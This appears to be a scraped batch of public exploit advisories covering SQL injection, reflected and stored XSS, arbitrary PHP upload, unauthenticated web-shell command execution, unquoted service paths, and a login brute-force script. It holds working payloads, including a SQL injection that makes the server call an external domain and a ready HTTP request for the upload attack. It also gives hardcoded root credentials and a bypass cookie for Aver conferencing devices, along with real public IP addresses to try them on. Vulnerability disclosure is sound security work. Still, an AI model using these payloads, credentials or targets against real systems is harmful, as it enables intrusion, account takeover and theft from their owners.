<pre><code>## Title: Video Sharing Website 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.18.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html<br /><br />## Description:<br />The `email` parameter from `ajax.php` app of Video Sharing Website 1.0<br />appears to be vulnerable to SQL injection attacks. The payload<br />'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'<br />was submitted in the email parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can take administrator<br />account controll on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=jsmith@sample.com'+(select<br />load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''<br />AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND<br />'yreq'='yreq&password=jsmith123<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4x2rfk)<br /><br /></code></pre>
<pre><code>## Title: Cosmetics and Beauty Product Online Store v1.0 remote<br />Multiple XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 02.18.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html<br />## CVE-Cosmetics and Beauty Product Online Store v1.0<br /><br /><br />## Description:<br />The `search` parameter from /cbpos/ app on Cosmetics and Beauty<br />Product Online Store v1.0 appears to be vulnerable to multiple<br />XSS-Reflected attacks.<br />The attacker can take very sensitive information from the system and<br />even he can prepare a very dangerous RCE by using this XSS<br />vulnerability.<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```URL<br /><a href="https://www.pornhub.com/">Please visit our beauty store!</a><br /><a href="https://www.nu11secur1ty.com/"><img<br />src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"><br />```<br />- RCE example:<br /><br />```URL<br /><a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img<br />src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/sbzew8)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code><--<br /><br /># Exploit Title: Signup Php Portal Arbitrary File Upload<br /># Google Dork: N/A<br /># Date: 19/12/2021<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://codecanyon.net/item/signup-php-portal/23066564<br /># Software Demo :https://ocsolutions.co.in/signup_custom_script/customer_register.php<br /># Category: webapps<br /># Version: 2.1<br /><br />1. Description<br /><br />Signup Php Portal script contain arbitrary file upload<br />using the form you can upload php files and bypass secuirty with burb suite intercept tool<br /><br />signup link :<br /><br />https://localhost/signup_custom_script/customer_register.php<br /><br />in the section of other images upload your file.php.gif and use intercept tool in burbsuite to edit the raw<br /><br />details <br /><br />POST /signup_custom_script/upload.php HTTP/1.1<br />Host: host<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962<br />Content-Length: 294712<br />Origin: https://localhost<br />Connection: close<br />Referer: https://localhost/signup_custom_script/customer_register.php<br />Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------232155580731505179933631361962<br />Content-Disposition: form-data; name="name"<br /><br />p1fna9ivqhk6g1fbjqto1f711ooq9.gif <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP<br />-----------------------------232155580731505179933631361962<br />Content-Disposition: form-data; name="file"; filename="2.php.gif" <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP<br />Content-Type: image/gif<br /><br />#####<br />forward and all done <br /><br />your file name will be <br />p1fna9ivqhk6g1fbjqto1f711ooq9.php<br /><br />and this is the upload dir <br /><br />https://localhost//signup_custom_script/uploads/<br /><br />your file will be on this link<br /><br />https://localhost//signup_custom_script/uploads/p1fna9ivqhk6g1fbjqto1f711ooq9.php<br /><br /><br /><br /><br />--><br /></code></pre>
<pre><code>#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : TOSHIBA<br />#Version : TOSHIBA Navi Support Service 1.00.0000<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br />C:\Users\Administrador>sc qc TNaviSrv<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: TNaviSrv<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD<br />PLAYER\TNaviSrv.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : TOSHIBA Navi Support Service<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /><br /></code></pre>
<pre><code># Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)<br /># Google Dork: inurl:/alfacgiapi intext:alfa<br /># Date: 2021-12-19<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: http://solevisible.com<br /># Software Link: https://phpshells.com/alfa-tesla-v4-1-shell<br /># Version: v4.1<br /># Tested on: Windows 10 Enterprise x64 , Linux<br /><br /># [ About - ALFA TEAM SHELL TESLA ] :<br /><br />#It is one of the most popular web shells used by hackers,They use it to access the server side.<br /><br /># [ Vulnerable Files ] : <br /><br /># 1 . perl.alfa<br /># 2 . bash.alfa<br /># 3 . py.alfa<br /><br /># [ Description ]:<br /><br />#Execute commands without authentication or logging in to the web shell,<br />#To use, find only one of the vulnerable files,<br />#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.<br /><br /># [ POC ] :<br /><br />curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa<br /></code></pre>
<pre><code>#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path<br />#Exploit Date: 2022-02-17<br />#Vendor : IVT Corp<br />#Version : BlueSoleilCS 5.4.277<br />#Vendor Homepage : www.ivtcorporation.com<br />#Tested on OS: Windows 7 Pro<br /><br />#This software installs EDTService.exe version 11.10.2.1<br /><br />#Analyze PoC :<br />==============<br />C:\>sc qc BlueSoleilCS<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: BlueSoleilCS<br /> TIPO : 120 WIN32_SHARE_PROCESS (interactive)<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files\IVT<br />Corporation\BlueSoleil\BlueSoleilCS.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : BlueSoleilCS<br /> DEPENDENCIAS : RPCSS<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code>Firmware for Aver EVC300 (multipoint video conferencing system) v00.10.16.36 and others (as well as firmware for several other devices manufactured by Aver, potentially all multipoint video conferencing systems) contains multiple advanced features that are not well documented:<br /><br />1. The web admin server continues to run even if the web administration is disabled. Check for whether access is local to the device or remote is done in Javascript using specific cookie.<br />By setting the cookie as follows during page load:<br /><br />document.cookie="VnsSuperPassword=#qC9,kD:;CupSuperPassword=fu.1u3wk4;"<br />it is possible to bypass the remote access restrictions, and use "local" UI.<br /><br />2. Once the "access restrictions" are bypassed, it is possible to enable normal remote access. It is also possible to reset admin password by setting<br />a Javascript variable in adminPwd.js (variable name j in the version we had available) to 1 using JS debugging. This disables security check asking to enter prior password.<br />This feature is obviously an educational tool to acquaint children with browser debug console.<br /><br />3. URL <EVC300 IP>/monitor/monitor.jpg is accessible regardless of authentication status, and shows low resolution image of monitor the device is connected to, or camera, depending on device status.<br />Older versions of firmware used URL "rimg/monitor.jpg"<br /><br />4. Device has ssh daemon (dropbear, others on other devices) listening on ports 1587,1588 and 1589.<br />It also has a hardcoded account avermediainfo with password avi2008 that has root privileges on the device.<br /><br />1587/tcp open ssh syn-ack ttl 63 Dropbear sshd 2013.60 (protocol 2.0)<br />1588/tcp open ssh syn-ack ttl 62 Dropbear sshd 2013.60 (protocol 2.0)<br />1589/tcp open ssh syn-ack ttl 62 Dropbear sshd 2013.60 (protocol 2.0)<br /><br />5. By accessing device over ssh, one can read the file /mnt/others/var/Olympus/Athena.ini, where administrator password is stored in clear text ("1234" is default password):<br />Password="*****"<br />PPPoEPassword="aver"<br />SIPTerminalPassword=""<br />SIPServerPasswordOn=Y<br />SIPServerPassword="1234"<br />IwbPw="1234"<br />AccessCode="1234"<br />RegGatekeeperPwd=""<br />This is very convenient in case one forgot administrator password and does not want to bother with JS console.<br /><br />6. As of the time of writing this, the above features can be enjoyed at the site vcdemo.aver.com (61.219.195.10), as well as several other IP addresses in the same range, such as 61.219.195.23.<br />Additional edutainment endpoints can be found by using Nmap, or, for example, by using censys.io to search HTML title (services.http.response.html_title="Video Conference"), and then checking resulting IP addresses.<br /><br /><br /></code></pre>
<pre><code>#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-14<br />#Vendor : Hewlett-Packard(HP)<br />#Version : File Sanitizer for HP ProtectTools 5.0.1.3<br />#Vendor Homepage : http://www.hp.com<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc HPFSService<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: HPFSService<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File<br />Sanitizer\HPFSService.exe<br /> GRUPO_ORDEN_CARGA : File System<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities<br /># Exploit Author: heinjame<br /># Date: 22/10/2021<br /># Exploit Author: picaro_o<br /># Vendor Homepage: https://www.exponentcms.org/<br /># Version: <=2.6<br /># Tested on: Linux os<br /><br />*Stored XSS*<br /><br />Affected parameter = ><br />http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,<br />Text Block)<br /><br />Payload = <iframe/src="data:text/html,<svg onload=alert(1)>"><br /><br />** *Database credential are disclosed in response ***<br /><br />POC<br />```<br />var adminerwindow = function (){<br /> var win =<br />window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');<br /> if (!win) { err(); }<br /> }<br />```<br /><br />**Authentication Bruteforce*<br />```<br />import argparse<br />import requests<br />import sys<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("url", help="URL")<br />parser.add_argument("Username list", help="Username List")<br />parser.add_argument("Password list", help="Password List")<br />pargs = parser.parse_args()<br /><br />host = sys.argv[1]<br />userlist = sys.argv[2]<br />passlist = sys.argv[3]<br /><br />try:<br /> readuser = open(userlist)<br /> readpass = open(passlist)<br />except:<br /> print("Unable to load files")<br /> exit()<br />def usernamebrute():<br /> s = requests.Session()<br /> for username in readuser.readlines():<br /> brute={<br /> 'controller':(None,'users'),<br /> 'src':(None,''),<br /> 'int':(None,''),<br /> 'action':(None,'send_new_password'),<br /> 'username':(None,username.strip()),<br /> }<br /> bruteforce = s.post(host+"/index.php",files=brute)<br /> status = s.get(host+"/users/reset_password")<br /> if "administrator" in status.text:<br /> print("[+] Found username : "+ username)<br /> adminaccount = username<br /> checkpoint = True<br /> return adminaccount,checkpoint<br /> break<br /><br />def passwordbrute(adminaccount):<br /> s = requests.Session()<br /> s.cookies.set("csrftoken", "abc")<br /> header = {<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)<br />Gecko/20100101 Firefox/78.0',<br />'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />'Accept-Language': 'en-US,en;q=0.5',<br />'Accept-Encoding': 'gzip, deflate',<br />'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',<br />'Referer': host+'/login/showlogin'<br /> }<br /> for password in readpass.readlines():<br /> brute={<br /> 'controller':'login',<br /> 'src':'',<br /> 'int':'',<br /> 'action':'login',<br /> 'username':adminaccount,<br /> 'password':password.strip()<br /> }<br /> bruteforce = s.post(host+"/index.php",headers=header,data=brute)<br /> # print(bruteforce.text)<br /> status = s.get(host+"/login/showlogin",cookies=csrf)<br /> print(status.text)<br /> if "Invalid Username / Password" not in status.text:<br /> print("[+] Found Password : "+ password)<br /> break<br /><br />adminaccount,checkpoint = usernamebrute()<br />if checkpoint == True:<br /> passwordbrute(adminaccount)<br />else:<br /> print("Can't find username,We can't proceed sorry :(")<br /><br />```<br /></code></pre>
<pre><code>#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : Intel<br />#Version : Intel(R) Management Engine Components 6.0.0.1189<br />#Vendor Homepage : https://www.intel.com<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc LMS<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: LMS<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)<br />Management Engine Components\LMS\LMS.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Intel(R) Management and Security Application<br />Local Management Service<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
